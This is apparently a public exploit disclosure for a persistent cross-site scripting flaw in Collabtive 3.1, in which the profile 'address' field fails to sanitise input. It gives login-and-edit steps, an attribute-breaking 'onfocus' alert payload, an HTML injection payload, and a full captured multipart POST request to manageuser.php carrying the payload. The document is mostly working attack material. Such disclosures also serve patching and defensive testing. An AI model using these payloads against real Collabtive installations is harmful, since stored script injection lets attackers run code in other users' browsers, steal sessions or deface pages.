Collabtive 3.1 Cross Site Scripting

`# Exploit Title: Collabtive 3.1 - 'address' Persistent Cross-Site Scripting  
# Date: 2021-01-23  
# Exploit Author: Deha Berkin Bir  
# Vendor Homepage: https://collabtive.o-dyn.de/  
# Version: 3.1  
# Tested on: Windows & XAMPP  
  
==> Tutorial <==  
  
1- Login to your account.  
2- Go to the profile edit page and write your XSS/HTML payload into "Address" section.  
- You will see the executed HTML payload at there. (HTML Injection)  
- You will see the executed XSS payload at profile edit section. (XSS)  
  
==> Executed Payloads <==  
  
XSS Payload ==> " onfocus="alert(1)" autofocus="  
HTML Payload ==> <h1>DehaBerkinBir</h1>  
  
==> HTTP Request <==  
  
POST /manageuser.php?action=edit HTTP/1.1  
Host: (HOST)  
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Referer: http://(HOST)/manageuser.php?action=editform&id=1  
Content-Type: multipart/form-data; boundary=---------------------------12097618915709137911841560297  
Content-Length: 2327  
Connection: close  
Cookie: activeSlideIndex=0; PHPSESSID=oj123o7asdfasdfu4pts2g  
Upgrade-Insecure-Requests: 1  
  
-----------------------------12097618915709137911841560297  
Content-Disposition: form-data; name="name"  
  
admin  
-----------------------------12097618915709137911841560297  
Content-Disposition: form-data; name="userfile"; filename=""  
Content-Type: application/octet-stream  
  
  
-----------------------------12097618915709137911841560297  
Content-Disposition: form-data; name="file-avatar"  
  
  
-----------------------------12097618915709137911841560297  
Content-Disposition: form-data; name="company"  
  
  
-----------------------------12097618915709137911841560297  
Content-Disposition: form-data; name="email"  
  
[email protected]  
-----------------------------12097618915709137911841560297  
Content-Disposition: form-data; name="web"  
  
  
-----------------------------12097618915709137911841560297  
Content-Disposition: form-data; name="tel1"  
  
  
-----------------------------12097618915709137911841560297  
Content-Disposition: form-data; name="tel2"  
  
  
-----------------------------12097618915709137911841560297  
Content-Disposition: form-data; name="address1"  
  
" onfocus="alert(1)" autofocus="  
-----------------------------12097618915709137911841560297  
  
Content-Disposition: form-data; name="zip"  
  
  
-----------------------------12097618915709137911841560297  
Content-Disposition: form-data; name="address2"  
  
  
-----------------------------12097618915709137911841560297  
Content-Disposition: form-data; name="country"  
  
  
-----------------------------12097618915709137911841560297  
Content-Disposition: form-data; name="state"  
  
admin  
-----------------------------12097618915709137911841560297  
Content-Disposition: form-data; name="gender"  
  
  
-----------------------------12097618915709137911841560297  
Content-Disposition: form-data; name="locale"  
  
  
-----------------------------12097618915709137911841560297  
Content-Disposition: form-data; name="admin"  
  
  
-----------------------------12097618915709137911841560297  
Content-Disposition: form-data; name="oldpass"  
  
admin  
-----------------------------12097618915709137911841560297  
Content-Disposition: form-data; name="newpass"  
  
  
-----------------------------12097618915709137911841560297  
Content-Disposition: form-data; name="repeatpass"  
  
  
-----------------------------12097618915709137911841560297--  
`